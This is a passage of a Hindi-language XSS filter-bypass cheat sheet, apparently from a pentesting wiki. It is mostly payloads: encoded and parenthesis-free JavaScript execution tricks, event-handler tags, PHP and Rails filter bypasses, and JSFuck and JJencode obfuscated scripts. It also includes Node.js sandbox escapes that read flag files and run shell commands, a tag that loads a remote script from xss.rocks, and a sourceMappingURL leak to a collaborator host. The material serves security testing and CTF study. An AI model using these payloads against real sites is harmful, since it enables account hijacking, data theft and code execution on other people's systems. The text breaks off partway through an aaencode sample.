<svg><script>alert&lpar;'1'&rpar;
<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>  <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">

यूनिकोड एन्कोड JS निष्पादन

\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)

JavaScript बाइपास ब्लैकलिस्ट तकनीक

स्ट्रिंग्स

"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))

विशेष भागने

'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
// Any other char escaped is just itself

JS कोड के अंदर स्पेस की जगह परिवर्तन

<TAB>
/**/

जावास्क्रिप्ट टिप्पणियाँ (से जावास्क्रिप्ट टिप्पणियाँ ट्रिक)

//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line

जावास्क्रिप्ट नए लाइन (से जावास्क्रिप्ट नई लाइन ट्रिक)

//Javascript interpret as new line these chars:
String.fromCharCode(10); alert('//\nalert(1)') //0x0a
String.fromCharCode(13); alert('//\ralert(1)') //0x0d
String.fromCharCode(8232); alert('//\u2028alert(1)') //0xe2 0x80 0xa8
String.fromCharCode(8233); alert('//\u2029alert(1)') //0xe2 0x80 0xa9

जावास्क्रिप्ट श्वेतस्थान

log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279

//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert&#65279;(1)>

टिप्पणी के अंदर जावास्क्रिप्ट

//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send

//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com

पारेंथेसिस के बिना जावास्क्रिप्ट

// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name

// Backtips
// Backtips pass the string as an array of lenght 1
alert`1`

// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`

// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`

//It's possible to construct a function and call it
Function`x${'alert(1337)'}x```

// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead

// Using Reflect.apply to call any function with any argumnets
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.



// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''


// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}


// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.

केवलियता कार्य (अलर्ट) कॉल

//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')

//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>

DOM सुरक्षा दोष

यहाँ JS कोड है जो हमलावार द्वारा नियंत्रित असुरक्षित डेटा जैसे location.href का उपयोग कर रहा है। एक हमलावार, इसका दुरुपयोग करके विभिन्न JS कोड को निषेध कर सकता है। DOM सुरक्षा दोष का विस्तार कारण DOM सुरक्षा दोष का विस्तार इस पृष्ठ पर स्थानांतरित किया गया था:

pageDOM XSS

वहाँ आपको एक विस्तृत व्याख्या मिलेगी कि DOM सुरक्षा दोष क्या है, वे कैसे प्रेरित होते हैं, और उन्हें कैसे शोषित किया जाता है। इसके अलावा, उल्लिखित पोस्ट के अंत में आप DOM Clobbering हमलों के बारे में एक व्याख्या पा सकते हैं।

अन्य बायपास

सामान्यीकृत यूनिकोड

आप जांच सकते हैं कि प्रतिबिम्बित मान सर्वर में (या क्लाइंट साइड में) यूनिकोड सामान्यीकृत हो रहे हैं और इस कार्यक्षमता का दुरुपयोग करके सुरक्षा को छलना कर सकते हैं। यहाँ एक उदाहरण पाएं.

PHP FILTER_VALIDATE_EMAIL ध्वज बायपास

"><svg/onload=confirm(1)>"@x.y

Ruby-On-Rails बायपास

RoR मास असाइनमेंट के कारण उद्धरण HTML में डाले जाते हैं और फिर उद्धरण प्रतिबंध को अनदेखा कर दिया जाता है और टैग के अंदर अतिरिक्त फील्ड (onfocus) जोड़े जा सकते हैं। फॉर्म उदाहरण (इस रिपोर्ट से), अगर आप पेलोड भेजते हैं:

contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa

जोड़ "कुंजी", "मान" इस प्रकार से वापस दिखाया जाएगा:

{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}

फिर, onfocus विशेषता डाली जाएगी और XSS होगा।

विशेष संयोजनाएँ

<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)

XSS के साथ हेडर इंजेक्शन 302 प्रतिक्रिया में

यदि आपको पता चलता है कि आप 302 रीडायरेक्ट प्रतिक्रिया में हेडर्स इंजेक्ट कर सकते हैं, तो आप ब्राउज़र को विभिन्न JavaScript को क्रियान्वित करने का प्रयास कर सकते हैं। यह सरल नहीं है क्योंकि आधुनिक ब्राउज़र HTTP प्रतिक्रिया स्थिति कोड 302 होने पर HTTP प्रतिक्रिया बॉडी का व्याख्यान नहीं करते हैं, इसलिए केवल एक क्रॉस-साइट स्क्रिप्टिंग पेलोड अनर्थक है।

इस रिपोर्ट और इस एक में आप पढ़ सकते हैं कि आप कैसे लोकेशन हेडर के अंदर XSS पेलोड को जांचने और क्रियान्वित करने की अनुमति देने वाले कई प्रोटोकॉलों का परीक्षण कर सकते हैं। पिछले जाने वाले प्रोटोकॉल: mailto://, //x:1/, ws://, wss://, खाली लोकेशन हेडर, resource://.

केवल अक्षर, संख्या और डॉट

यदि आप इस संकेत कर सकते हैं कि कॉलबैक जिसे जावास्क्रिप्ट क्रियान्वित करने जा रहा है उसे उन वर्णों तक सीमित करने के लिए। इस पोस्ट के इस खंड को पढ़ें इस व्यवहार का दुरुपयोग कैसे करें।

मान्य `<script>` सामग्री प्रकार जो XSS के लिए

(से यहाँ) यदि आप application/octet-stream जैसे सामग्री प्रकार के साथ एक स्क्रिप्ट लोड करने का प्रयास करते हैं, तो Chrome निम्नलिखित त्रुटि फेंकेगा:

Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx' because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.

केवल Content-Types जो Chrome को एक लोडेड स्क्रिप्ट को चलाने का समर्थन करेंगे, वे हैं जो https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc की const kSupportedJavascriptTypes में हैं।

const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};

XSS के लिए स्क्रिप्ट प्रकार

(स्रोत से यहाँ) तो, कौन-कौन से प्रकार स्क्रिप्ट लोड करने के लिए संकेतित किए जा सकते हैं?

<script type="???"></script>

उत्तर है:

मॉड्यूल (डिफ़ॉल्ट, कुछ समझाने की आवश्यकता नहीं है)
वेबबंडल: वेब बंडल्स एक सुविधा है जिसके द्वारा आप डेटा (एचटीएमएल, सीएसएस, जेएस...) का एक समूह एक .wbn फ़ाइल में पैकेज कर सकते हैं।

<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP

importmap: आयात सिंटेक्स को सुधारने की अनुमति देता है।

<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>

<!-- With importmap you can do the following -->
<script>
import moment from "moment";
import { partition } from "lodash";
</script>

यह व्यवहार इस लेख में उपयोग किया गया था ताकि एक पुस्तकालय को eval पर पुनर्मार्पित किया जा सके और इसे ट्रिगर किया जा सके।

speculationrules: यह सुविधा मुख्य रूप से प्री-रेंडरिंग द्वारा उत्पन्न कुछ समस्याओं का समाधान करने के लिए है। यह इस प्रकार काम करता है:

<script type="speculationrules">
{
"prerender": [
{"source": "list",
"urls": ["/page/2"],
"score": 0.5},
{"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1}
]
}
</script>

Web सामग्री प्रकार एक्सएसएस के लिए

(से यहाँ) निम्नलिखित सामग्री प्रकार सभी ब्राउज़र्स में एक्सएसएस को क्रियाशील कर सकते हैं:

text/html
application/xhtml+xml
application/xml
text/xml
image/svg+xml
text/plain (?? सूची में नहीं है लेकिन मुझे लगता है कि मैंने एक सीटीएफ में इसे देखा था)
application/rss+xml (बंद)
application/atom+xml (बंद)

अन्य ब्राउज़र्स में अन्य Content-Types का उपयोग अर्बिट्रेरी जेएस को क्रियाशील करने के लिए किया जा सकता है, जांच करें: https://github.com/BlackFan/content-type-research/blob/master/XSS.md

xml सामग्री प्रकार

यदि पृष्ठ text/xml सामग्री प्रकार लौटा रहा है तो एक नेमस्पेस को संकेतित करना संभव है और अर्बिट्रेरी जेएस को क्रियाशील करना:

<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>

<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->

विशेष प्रतिस्थापन पैटर्न

जब कुछ इस प्रकार का "कुछ {{टेम्पलेट}} डेटा".replace("{{टेम्पलेट}}", <उपयोगकर्ता_इनपुट>) उपयोग किया जाता है। हमलावार विशेष स्ट्रिंग प्रतिस्थापन का उपयोग कर सकता है कुछ सुरक्षा को छलने के लिए: "123 {{टेम्पलेट}} 456".replace("{{टेम्पलेट}}", JSON.stringify({"नाम": "$'$`alert(1)//"}))

उदाहरण के लिए इस लेखन में, इसका उपयोग किया गया था एक स्क्रिप्ट के भीतर एक JSON स्ट्रिंग को बचाने और विभिन्न कोड को क्रियाशील करने के लिए।

Chrome कैश से XSS

pageChrome Cache to XSS

XS Jails Escape

यदि आपके पास केवल उपयोग करने के लिए सीमित वर्ण सेट है, तो XSJail समस्याओं के लिए इन अन्य मान्य समाधानों की जांच करें:

// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))

// use of with
with(console)log(123)
with(/console.log(1)/)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))

with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))

//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()

// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE

यदि सभी चीजें अपरिभाषित होती हैं पहले अविश्वसनीय कोड को निष्पादित करने से (जैसे कि इस लेख में) यह संभव है कि उपयोगी ऑब्जेक्ट्स "कुछ से कुछ" उत्पन्न किए जा सकते हैं ताकि अर्बिट्रे अविश्वसनीय कोड के निष्पादन का दुरुपयोग किया जा सके:

import()

// although import "fs" doesn’t work, import('fs') does.
import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))

require तक पहुंचना अप्रत्यक्ष रूप से

इसके अनुसार मॉड्यूल्स को नोड.जेएस द्वारा एक फ़ंक्शन के भीतर लपेटा जाता है, जैसे:

(function (exports, require, module, __filename, __dirname) {
// our actual module code
});

इसलिए, अगर हम उस मॉड्यूल से एक और फ़ंक्शन को कॉल कर सकते हैं, तो उस फ़ंक्शन से require तक पहुँचने के लिए arguments.callee.caller.arguments[1] का उपयोग करना संभव है:

(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()

पिछले उदाहरण की तरह ही, त्रुटि हैंडलर का उपयोग करके मॉड्यूल का व्रैपर तक पहुंचना संभव है और require फ़ंक्शन प्राप्त करना है:

try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log('='.repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req('child_process').execSync('id').toString())
}
}
}
trigger()

Obfuscation & Advanced Bypass

एक पेज में विभिन्न अवगुणन: https://aem1k.com/aurebesh.js/
https://github.com/aemkei/katakana.js
https://ooze.ninja/javascript/poisonjs
https://javascriptobfuscator.herokuapp.com/
https://skalman.github.io/UglifyJS-online/
http://www.jsfuck.com/
और उन्नत JSFuck: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce
http://utf-8.jp/public/jjencode.html
https://utf-8.jp/public/aaencode.html
https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses

//Katana
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>

//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

//JSFuck
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

//aaencode
ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ ['_']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +'_') [c^_^o];(ﾟДﾟ) ['c'] = ((ﾟДﾟ)+'_') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) ['o'] = ((ﾟДﾟ)+'_') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) ['c']+(ﾟДﾟ) ['o']+(ﾟωﾟﾉ +'_')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +'_') [ﾟｰﾟ] + ((ﾟДﾟ) +'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) ['c']+((ﾟДﾟ)+'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) ['o']+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ];(ﾟДﾟ) ['_'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+'_') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +'_') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟωﾟﾉ +'_') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]='\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +'_')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]='\"';(ﾟДﾟ) ['_'] ( (ﾟДﾟ) ['_'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ 